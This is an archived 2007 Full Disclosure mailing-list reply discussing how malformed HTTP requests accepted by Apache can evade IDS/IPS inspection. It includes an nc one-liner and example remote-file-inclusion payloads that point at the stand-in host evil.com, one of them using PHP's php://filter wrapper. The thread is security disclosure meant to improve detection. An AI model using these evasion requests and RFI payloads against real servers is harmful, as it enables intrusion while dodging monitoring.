Full Disclosure mailing list archives
Re: IPS Evasion with the Apache HTTP Server
From: "Jamie Riden" <jamie.riden () gmail com>
Date: Wed, 20 Jun 2007 13:39:21 +0100
On 20/06/07, 3APA3A <3APA3A () security nnov ru> wrote:
Dear H D Moore, --Tuesday, June 19, 2007, 11:20:41 PM, you wrote to full-disclosure () lists grok org uk: HDM> $ echo -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \ HDM> nc webserver 80 According to recommendations of RFC 2616, section 4.1 Web server or proxy server should ignore \r\n before request for compatibility with odd clients sending trailing \r\n with POST requests via keep-alive connections: In the interest of robustness, servers SHOULD ignore any empty line(s) received where a Request-Line is expected. In other words, if the server is reading the protocol stream at the beginning of a message and receives a CRLF first, it should ignore the CRLF. $ echo -ne " /buggy.php HTTP/1.0\r\n\r\n" | nc webserver 80 Does the same job. This problem (unsupported request method) was already reported by Michal Majchrowicz, see http://securityvulns.com/Qdocument846.html
(This is what I gathered from the original posting, but I might be wrong.) I think the issue is not that the apache server behaviour is wrong as such, but that IDS/IPS do not use the same algorithm as apache for checking validity of HTTP requests. Thus apache may accept and process a request like: \r\n\r\n\r\n\r\n\r\n\x0c/rfi.php?includedir=http://evil.com\x0bHTTP/1.0\r\n\r\n but that the IDS/IPS will ignore that packet on the grounds that "it's not a valid HTTP request"., when it should actually be alerting that a RFI attempt was made. While we're on the subject of IDS, it looks like PHP 5 supports a new wrapper php://filter, such that a RFI may be performed by: GET /rfi.php?includedir=php://filter/resource=http://www.evil.com - which may not be detected by some existing IDS signatures. (See http://uk2.php.net/manual/en/wrappers.php.php ) cheers, Jamie -- Jamie Riden / jamesr () europe com / jamie () honeynet org uk UK Honeynet Project: http://www.ukhoneynet.org/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- IPS Evasion with the Apache HTTP Server H D Moore (Jun 19)
- Re: IPS Evasion with the Apache HTTP Server coderman (Jun 19)
- Re: IPS Evasion with the Apache HTTP Server Valdis . Kletnieks (Jun 19)
- Re: IPS Evasion with the Apache HTTP Server coderman (Jun 19)
- Re: IPS Evasion with the Apache HTTP Server Valdis . Kletnieks (Jun 19)
- Re: IPS Evasion with the Apache HTTP Server 3APA3A (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server Jamie Riden (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server 3APA3A (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server H D Moore (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server H D Moore (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server Jamie Riden (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server coderman (Jun 19)